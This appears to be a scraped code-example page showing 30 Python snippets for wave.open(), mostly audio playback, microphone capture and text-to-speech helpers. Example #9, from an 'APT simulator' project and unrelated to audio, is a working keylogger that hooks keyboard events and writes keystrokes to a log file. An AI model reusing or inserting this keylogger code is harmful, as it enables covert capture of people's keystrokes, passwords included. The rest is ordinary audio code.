Python wave.open() Examples

The following are 30 code examples of wave.open(). You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may also want to check out all available functions/classes of the module wave, or try the search function.
Example #1
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 13 votes |
def __enter__(self):
    """Start the asynchronous microphone capture stream and return self."""
    self._audio_interface = pyaudio.PyAudio()
    # The stream is filled from a background callback so the input
    # device's buffer does not overflow while the calling thread makes
    # network requests, etc.
    self._audio_stream = self._audio_interface.open(
        format=pyaudio.paInt16,
        channels=1,
        rate=self._rate,
        input=True,
        frames_per_buffer=self._chunk,
        stream_callback=self._fill_buffer,
    )
    self.closed = False
    return self
Example #2
Source File: snowboydecoder.py From google-assistant-hotword-raspi with MIT License | 11 votes |
def play_audio_file(fname=DETECT_DING):
    """Simple callback function to play a wave file.

    By default it plays a Ding sound.

    :param str fname: wave file name
    :return: None
    """
    ding_wav = wave.open(fname, 'rb')
    sample_width = ding_wav.getsampwidth()
    channels = ding_wav.getnchannels()
    frame_rate = ding_wav.getframerate()
    ding_data = ding_wav.readframes(ding_wav.getnframes())
    # Close the reader as soon as the frames are in memory; the original
    # leaked this handle.
    ding_wav.close()
    audio = pyaudio.PyAudio()
    stream_out = audio.open(
        format=audio.get_format_from_width(sample_width),
        channels=channels,
        rate=frame_rate,
        input=False,
        output=True)
    stream_out.start_stream()
    stream_out.write(ding_data)
    time.sleep(0.2)
    stream_out.stop_stream()
    stream_out.close()
    audio.terminate()
Example #3
Source File: _audio.py From ai-makers-kit with MIT License | 8 votes |
def play_wav(fname, chunk=CHUNK):
    """Play the wav file *fname* through the default output device.

    :param fname: path of the wav file
    :param chunk: number of frames read and written per iteration
    """
    # create an audio object
    wf = wave.open(fname, 'rb')
    p = pyaudio.PyAudio()
    try:
        # open stream based on the wave object which has been input.
        stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                        channels=wf.getnchannels(),
                        rate=wf.getframerate(),
                        output=True)
        # read data (based on the chunk size)
        data = wf.readframes(chunk)
        # play stream (looping from beginning of file to the end)
        while len(data) > 0:
            # writing to the stream is what *actually* plays the sound.
            stream.write(data)
            data = wf.readframes(chunk)
        stream.close()
    finally:
        # The original leaked the wave reader and, on error, the PyAudio
        # instance; release both deterministically.
        wf.close()
        p.terminate()
Example #4
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 7 votes |
def play_file(fname):
    """Play the wav file *fname* through the default output device."""
    # create an audio object
    wf = wave.open(fname, 'rb')
    p = pyaudio.PyAudio()
    chunk = 1024
    try:
        # open stream based on the wave object which has been input.
        stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                        channels=wf.getnchannels(),
                        rate=wf.getframerate(),
                        output=True)
        # read data (based on the chunk size)
        data = wf.readframes(chunk)
        # play stream (looping from beginning of file to the end)
        while len(data) > 0:
            # writing to the stream is what *actually* plays the sound.
            stream.write(data)
            data = wf.readframes(chunk)
        stream.close()
    finally:
        # The original never closed the wave reader; release it and the
        # PyAudio instance even if playback fails.
        wf.close()
        p.terminate()
Example #5
Source File: raw_data_loaders.py From ibllib with MIT License | 7 votes |
def load_mic(session_path):
    """Load Microphone wav file to np.array of len nSamples.

    :param session_path: Absolute path of session folder
    :type session_path: str
    :return: (nSamples, nChannels) int16 array of the sound waveform, or
        None when the session path or the wav file is missing
    :rtype: numpy.ndarray
    """
    if session_path is None:
        return
    path = Path(session_path).joinpath("raw_behavior_data")
    path = next(path.glob("_iblrig_micData.raw*.wav"), None)
    if not path:
        return None
    # Context manager closes the reader deterministically; the original
    # leaked the handle.
    with wave.open(str(path)) as fp:
        nchan = fp.getnchannels()
        N = fp.getnframes()
        dstr = fp.readframes(N * nchan)
    data = np.frombuffer(dstr, np.int16)
    data = np.reshape(data, (-1, nchan))
    return data
Example #6
Source File: _audio.py From ai-makers-kit with MIT License | 7 votes |
def play_wav(fname, chunk=CHUNK):
    """Play the wav file *fname* through the default output device.

    :param fname: path of the wav file
    :param chunk: number of frames read and written per iteration
    """
    # create an audio object
    wf = wave.open(fname, 'rb')
    p = pyaudio.PyAudio()
    try:
        # open stream based on the wave object which has been input.
        stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                        channels=wf.getnchannels(),
                        rate=wf.getframerate(),
                        output=True)
        # read data (based on the chunk size)
        data = wf.readframes(chunk)
        # play stream (looping from beginning of file to the end)
        while len(data) > 0:
            # writing to the stream is what *actually* plays the sound.
            stream.write(data)
            data = wf.readframes(chunk)
        stream.close()
    finally:
        # The original leaked the wave reader and, on error, the PyAudio
        # instance; release both deterministically.
        wf.close()
        p.terminate()
Example #7
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText, inFileName):
    """Request TTS audio for *inText* over gRPC and save it to *inFileName*.

    :param inText: text to synthesize
    :param inFileName: path of the output audio file
    """
    channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials())
    stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel)
    message = gigagenieRPC_pb2.reqText()
    message.lang = 0
    message.mode = 0
    message.text = inText
    # "with" guarantees the file is closed even if the RPC stream fails
    # mid-transfer (the original leaked the handle on error).
    with open(inFileName, 'wb') as writeFile:
        for response in stub.getText2VoiceStream(message):
            if response.HasField("resOptions"):
                print("ResVoiceResult: %d" % (response.resOptions.resultCd))
            if response.HasField("audioContent"):
                print("Audio Stream")
                writeFile.write(response.audioContent)
Example #8
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText, inFileName):
    """Request TTS audio for *inText* over gRPC and save it to *inFileName*.

    :param inText: text to synthesize
    :param inFileName: path of the output audio file
    """
    channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials())
    stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel)
    message = gigagenieRPC_pb2.reqText()
    message.lang = 0
    message.mode = 0
    message.text = inText
    # "with" guarantees the file is closed even if the RPC stream fails
    # mid-transfer (the original leaked the handle on error).
    with open(inFileName, 'wb') as writeFile:
        for response in stub.getText2VoiceStream(message):
            if response.HasField("resOptions"):
                print("ResVoiceResult: %d" % (response.resOptions.resultCd))
            if response.HasField("audioContent"):
                print("Audio Stream")
                writeFile.write(response.audioContent)
Example #9
Source File: apt_simulator.py From hack4career with Apache License 2.0 | 6 votes |
def keylogger(): if console: print "* Logging key events... (press enter to escape)" def OnKeyboardEvent (event): keys = "" full_path = os.path.realpath(__file__) path, file = os.path.split(full_path) path = path + "\keylogs.txt" keyfile = open(path, "a") key = chr(event.Ascii) if event.Ascii == 13: key = "\n" hook.UnhookKeyboard() if console: print "* done\n" main() keys = keys + key keyfile.write(keys) keyfile.close() hook = pyHook.HookManager() hook.KeyDown = OnKeyboardEvent hook.HookKeyboard() pythoncom.PumpMessages()
Example #10
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 6 votes |
def __enter__(self):
    """Open the microphone stream asynchronously; returns self."""
    self._audio_interface = pyaudio.PyAudio()
    stream_options = dict(
        format=pyaudio.paInt16,
        channels=1,
        rate=self._rate,
        input=True,
        frames_per_buffer=self._chunk,
        # The asynchronous callback keeps the device buffer drained while
        # the calling thread performs network requests, etc.
        stream_callback=self._fill_buffer,
    )
    self._audio_stream = self._audio_interface.open(**stream_options)
    self.closed = False
    return self
Example #11
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText, inFileName):
    """Request TTS audio for *inText* over gRPC and save it to *inFileName*.

    :param inText: text to synthesize
    :param inFileName: path of the output audio file
    """
    channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials())
    stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel)
    message = gigagenieRPC_pb2.reqText()
    message.lang = 0
    message.mode = 0
    message.text = inText
    # "with" guarantees the file is closed even if the RPC stream fails
    # mid-transfer (the original leaked the handle on error).
    with open(inFileName, 'wb') as writeFile:
        for response in stub.getText2VoiceStream(message):
            if response.HasField("resOptions"):
                print("ResVoiceResult: %d" % (response.resOptions.resultCd))
            if response.HasField("audioContent"):
                print("Audio Stream")
                writeFile.write(response.audioContent)
Example #12
Source File: main.py From HanTTS with MIT License | 6 votes |
def _play_audio(path, delay):
    """Play the wav file at *path* after *delay* seconds, best effort.

    Playback failures are deliberately swallowed so a bad audio device
    never crashes the caller.
    """
    try:
        time.sleep(delay)
        wf = wave.open(path, 'rb')
        p = pyaudio.PyAudio()
        stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                        channels=wf.getnchannels(),
                        rate=wf.getframerate(),
                        output=True)
        data = wf.readframes(TextToSpeech.CHUNK)
        while data:
            stream.write(data)
            data = wf.readframes(TextToSpeech.CHUNK)
        stream.stop_stream()
        stream.close()
        p.terminate()
        return
    except Exception:
        # Narrowed from a bare "except:" so SystemExit and
        # KeyboardInterrupt still propagate; playback stays best-effort.
        pass
Example #13
Source File: raw_data_loaders.py From ibllib with MIT License | 6 votes |
def load_settings(session_path):
    """Load the PyBpod settings file (.json) for a session.

    :param session_path: Absolute path of session folder
    :type session_path: str
    :return: Settings dictionary, or None when no settings file exists
    :rtype: dict
    """
    if session_path is None:
        return
    json_file = next(
        Path(session_path).joinpath("raw_behavior_data").glob(
            "_iblrig_taskSettings.raw*.json"),
        None,
    )
    if not json_file:
        return None
    with open(json_file, 'r') as fid:
        settings = json.load(fid)
    # Older sessions may predate the version tag; normalise to ''.
    settings.setdefault('IBLRIG_VERSION_TAG', '')
    return settings
Example #14
Source File: models.py From cloud-asr with Apache License 2.0 | 6 votes |
def save_wav(self, chunk_id, model, body, frame_rate):
    """Persist raw PCM *body* as a mono 16-bit wav file.

    The file name is the MD5 of the payload, sharded into a two-character
    sub-directory, so identical recordings de-duplicate.

    :return: (filesystem path, static URL) tuple
    """
    import hashlib
    # hashlib.md5 replaces md5.new: the "md5" module is Python-2-only
    # and was removed in Python 3.
    checksum = hashlib.md5(body).hexdigest()
    directory = "%s/%s" % (model, checksum[:2])
    self.create_directories_if_needed(self.path + "/" + directory)
    path = '%s/%s/%s.wav' % (self.path, directory, checksum)
    url = '/static/data/%s/%s.wav' % (directory, checksum)
    wav = wave.open(path, 'w')
    wav.setnchannels(1)
    wav.setsampwidth(2)
    wav.setframerate(frame_rate)
    wav.writeframes(body)
    wav.close()
    return (path, url)
Example #15
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText, inFileName):
    """Request TTS audio for *inText* over gRPC and save it to *inFileName*.

    :param inText: text to synthesize
    :param inFileName: path of the output audio file
    """
    channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials())
    stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel)
    message = gigagenieRPC_pb2.reqText()
    message.lang = 0
    message.mode = 0
    message.text = inText
    # "with" guarantees the file is closed even if the RPC stream fails
    # mid-transfer (the original leaked the handle on error).
    with open(inFileName, 'wb') as writeFile:
        for response in stub.getText2VoiceStream(message):
            if response.HasField("resOptions"):
                print("ResVoiceResult: %d" % (response.resOptions.resultCd))
            if response.HasField("audioContent"):
                print("Audio Stream")
                writeFile.write(response.audioContent)
Example #16
Source File: cutoff.py From GST-Tacotron with MIT License | 6 votes |
def cutoff(input_wav, output_wav):
    '''
    Trim leading and trailing silence from a 16-bit mono wav file.

    input_wav --- input wav file path
    output_wav --- output wav file path

    A sample counts as signal once its magnitude exceeds 8% of the file's
    peak amplitude; everything before the first and after the last such
    sample is dropped.
    '''
    # read input wave file and get parameters.
    with wave.open(input_wav, 'r') as fw:
        params = fw.getparams()
        nchannels, sampwidth, framerate, nframes = params[:4]
        strData = fw.readframes(nframes)
    # np.frombuffer replaces np.fromstring, which is deprecated for
    # binary data.
    waveData = np.frombuffer(strData, dtype=np.int16)

    max_v = np.max(abs(waveData))
    for i in range(waveData.shape[0]):
        if abs(waveData[i]) > 0.08 * max_v:
            break
    for j in range(waveData.shape[0] - 1, 0, -1):
        if abs(waveData[j]) > 0.08 * max_v:
            break

    # write new wav file; the slice arithmetic assumes 16-bit mono
    # (2 bytes per frame), matching the int16 decode above.
    with wave.open(output_wav, 'w') as fw:
        params = list(params)
        params[3] = nframes - i - (waveData.shape[0] - 1 - j)
        fw.setparams(params)
        fw.writeframes(strData[2 * i:2 * (j + 1)])
Example #17
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText, inFileName):
    """Request TTS audio for *inText* over gRPC and save it to *inFileName*.

    :param inText: text to synthesize
    :param inFileName: path of the output audio file
    """
    channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials())
    stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel)
    message = gigagenieRPC_pb2.reqText()
    message.lang = 0
    message.mode = 0
    message.text = inText
    # "with" guarantees the file is closed even if the RPC stream fails
    # mid-transfer (the original leaked the handle on error).
    with open(inFileName, 'wb') as writeFile:
        for response in stub.getText2VoiceStream(message):
            if response.HasField("resOptions"):
                print("ResVoiceResult: %d" % (response.resOptions.resultCd))
            if response.HasField("audioContent"):
                print("Audio Stream")
                writeFile.write(response.audioContent)
Example #18
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 5 votes |
def getCredentials():
    """Build composite gRPC channel credentials (TLS root CA + per-call metadata)."""
    with open('../data/ca-bundle.pem', 'rb') as pem:
        root_ca = pem.read()
    ssl_credentials = grpc.ssl_channel_credentials(root_certificates=root_ca)
    call_credentials = grpc.metadata_call_credentials(credentials)
    return grpc.composite_channel_credentials(ssl_credentials, call_credentials)

### KWS
Example #19
Source File: audio.py From tensor2tensor with Apache License 2.0 | 5 votes |
def _get_timit(directory):
    """Extract TIMIT datasets to directory unless directory/timit exists."""
    if os.path.exists(os.path.join(directory, "timit")):
        return
    assert FLAGS.timit_paths
    for path in FLAGS.timit_paths.split(","):
        # NOTE(review): extractall trusts the archive contents; assumes the
        # TIMIT tarballs come from a trusted source.
        with tf.gfile.GFile(path) as f, \
                tarfile.open(fileobj=f, mode="r:gz") as archive:
            archive.extractall(directory)
Example #20
Source File: audio.py From tensor2tensor with Apache License 2.0 | 5 votes |
def _get_audio_data(filepath):
    """Convert a NIST SPHERE .WAV file to a true wav and decode it.

    Returns (byte values as ints, frame count, sample width, channel count).
    """
    # Construct a true .wav file.  str.strip(".WAV") stripped *characters*
    # (any of '.', 'W', 'A', 'V') from both ends, mangling many names;
    # drop the suffix explicitly instead.
    if filepath.endswith(".WAV"):
        out_filepath = filepath[:-len(".WAV")] + ".wav"
    else:
        out_filepath = filepath + ".wav"
    # Assumes sox is installed on system. Sox converts from NIST SPHERE to WAV.
    subprocess.call(["sox", filepath, out_filepath])
    # wave needs a binary-mode file object; the original opened text mode.
    with open(out_filepath, "rb") as fobj:
        wav_file = wave.open(fobj)
        frame_count = wav_file.getnframes()
        byte_array = wav_file.readframes(frame_count)
        sample_width = wav_file.getsampwidth()
        channels = wav_file.getnchannels()
    # bytearray yields ints on both Python 2 and 3, replacing the
    # Python-2-only b.encode("hex") round-trip.
    data = list(bytearray(byte_array))
    return data, frame_count, sample_width, channels
Example #21
Source File: lib.py From cloud-asr with Apache License 2.0 | 5 votes |
def load_wav(self, path):
    """Open *path* as a wave reader and validate its format.

    Raises Exception when the file is not mono or its sample width
    differs from the expected one.
    """
    reader = wave.open(path, 'r')
    if reader.getnchannels() != 1:
        raise Exception('Input wave is not in mono')
    if reader.getsampwidth() != self.sample_width:
        raise Exception('Input wave is not in %d Bytes' % self.sample_width)
    return reader
Example #22
Source File: ex2_getVoice2Text.py From ai-makers-kit with MIT License | 5 votes |
def play_file(fname):
    """Play the wav file *fname* through the default output device."""
    # create an audio object
    wf = wave.open(fname, 'rb')
    p = pyaudio.PyAudio()
    chunk = 1024
    try:
        # open stream based on the wave object which has been input.
        stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                        channels=wf.getnchannels(),
                        rate=wf.getframerate(),
                        output=True)
        # read data (based on the chunk size)
        data = wf.readframes(chunk)
        # On Python 3 readframes() returns bytes, so the original
        # "data != ''" test was always True and only an inner b'' check
        # ended the loop; test the bytes directly instead.
        while data:
            stream.write(data)
            data = wf.readframes(chunk)
        # cleanup stuff.
        print('End of audio stream')
        stream.close()
    finally:
        # Close the wave reader (leaked by the original) and terminate
        # PyAudio even when playback raises.
        wf.close()
        p.terminate()
Example #23
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 5 votes |
def getCredentials():
    """Build composite gRPC channel credentials (TLS root CA + per-call metadata)."""
    with open('/home/pi/ai-makers-kit/data/ca-bundle.pem', 'rb') as pem:
        root_ca = pem.read()
    ssl_credentials = grpc.ssl_channel_credentials(root_certificates=root_ca)
    call_credentials = grpc.metadata_call_credentials(credentials)
    return grpc.composite_channel_credentials(ssl_credentials, call_credentials)

### END OF COMMON ###

# TTS : getText2VoiceStream
Example #24
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 5 votes |
def play_file(fname):
    """Play the wav file *fname* through the default output device."""
    # create an audio object
    wf = wave.open(fname, 'rb')
    p = pyaudio.PyAudio()
    chunk = 1024
    try:
        # open stream based on the wave object which has been input.
        stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                        channels=wf.getnchannels(),
                        rate=wf.getframerate(),
                        output=True)
        # read data (based on the chunk size)
        data = wf.readframes(chunk)
        # On Python 3 readframes() returns bytes, so the original
        # "data != ''" test was always True and only an inner b'' check
        # ended the loop; test the bytes directly instead.
        while data:
            stream.write(data)
            data = wf.readframes(chunk)
        # cleanup stuff.
        print('End of audio stream')
        stream.close()
    finally:
        # Close the wave reader (leaked by the original) and terminate
        # PyAudio even when playback raises.
        wf.close()
        p.terminate()

# KWS
Example #25
Source File: ex2_getVoice2Text.py From ai-makers-kit with MIT License | 5 votes |
def getCredentials():
    """Build composite gRPC channel credentials (TLS root CA + per-call metadata)."""
    with open('../data/ca-bundle.pem', 'rb') as pem:
        root_ca = pem.read()
    ssl_credentials = grpc.ssl_channel_credentials(root_certificates=root_ca)
    call_credentials = grpc.metadata_call_credentials(credentials)
    return grpc.composite_channel_credentials(ssl_credentials, call_credentials)

### END OF COMMON ###

### STT
Example #26
Source File: _audio.py From ai-makers-kit with MIT License | 5 votes |
def __enter__(self):
    """Create the PyAudio interface and start capturing; returns self."""
    self._audio_interface = pyaudio.PyAudio()
    # A background callback fills the buffer so the input device cannot
    # overflow while the calling thread is busy with network I/O.
    self._audio_stream = self._audio_interface.open(
        format=pyaudio.paInt16,
        channels=1,
        rate=self._rate,
        input=True,
        frames_per_buffer=self._chunk,
        stream_callback=self._fill_buffer,
    )
    self.closed = False
    return self
Example #27
Source File: MicrophoneStream.py From ai-makers-kit with MIT License | 5 votes |
def __enter__(self):
    """Enter the context: open an asynchronous mono int16 input stream."""
    self._audio_interface = pyaudio.PyAudio()
    capture_config = dict(
        format=pyaudio.paInt16,
        channels=1,
        rate=self._rate,
        input=True,
        frames_per_buffer=self._chunk,
        # Callback-driven capture prevents device-buffer overflow while
        # the calling thread makes network requests, etc.
        stream_callback=self._fill_buffer,
    )
    self._audio_stream = self._audio_interface.open(**capture_config)
    self.closed = False
    return self
Example #28
Source File: ex2_getVoice2Text.py From ai-makers-kit with MIT License | 5 votes |
def __enter__(self):
    """Start the asynchronous microphone capture stream and return self."""
    self._audio_interface = pyaudio.PyAudio()
    # The stream is filled from a background callback so the input
    # device's buffer does not overflow while the calling thread makes
    # network requests, etc.
    self._audio_stream = self._audio_interface.open(
        format=pyaudio.paInt16,
        channels=1,
        rate=self._rate,
        input=True,
        frames_per_buffer=self._chunk,
        stream_callback=self._fill_buffer,
    )
    self.closed = False
    return self
Example #29
Source File: _player.py From ai-makers-kit with MIT License | 5 votes |
def play_wav(self, wav_path):
    """Play audio from the given WAV file.

    The file should be mono and small enough to load into memory.

    Args:
      wav_path: path to the wav file
    """
    wav = wave.open(wav_path, 'r')
    try:
        if wav.getnchannels() != 1:
            raise ValueError(wav_path + ' is not a mono file')
        frames = wav.readframes(wav.getnframes())
        sample_rate = wav.getframerate()
        sample_width = wav.getsampwidth()
    finally:
        # Close even when the mono check raises; the original leaked the
        # handle on that path.
        wav.close()
    self.play_bytes(frames, sample_rate, sample_width)
Example #30
Source File: _player.py From ai-makers-kit with MIT License | 5 votes |
def load_audio(self, wav_path):
    """Pre-load a mono WAV file's frames and format for later playback.

    Args:
      wav_path: path to the wav file

    Raises:
      ValueError: if the file is not mono.
    """
    wav = wave.open(wav_path, 'r')
    try:
        if wav.getnchannels() != 1:
            raise ValueError(wav_path + ' is not a mono file')
        self._loaded_bytes = wav.readframes(wav.getnframes())
        self._loaded_samplerate = wav.getframerate()
        self._loaded_samplewidth = wav.getsampwidth()
    finally:
        # Close even when the mono check raises; the original leaked the
        # handle on that path.
        wav.close()